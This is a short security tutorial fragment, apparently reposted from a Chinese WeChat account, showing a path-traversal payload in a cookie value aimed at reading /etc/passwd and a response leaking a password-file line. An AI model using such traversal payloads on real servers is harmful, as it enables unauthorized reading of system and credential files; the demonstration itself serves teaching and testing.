Request
GET /vulnerable.php HTTP/1.1
Cookie:usid=../../../../../../../../../../../../../etc/pasdwd
Response
HTTP/1.1 200 OK
...
Server Apache 2.4 root:fi3sER6:0:1:System Operator:/:/bin/ksh//
本文始发于微信公众号(Khan安全攻防实验室):如何根据cookie查找本地文件读取vuln
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论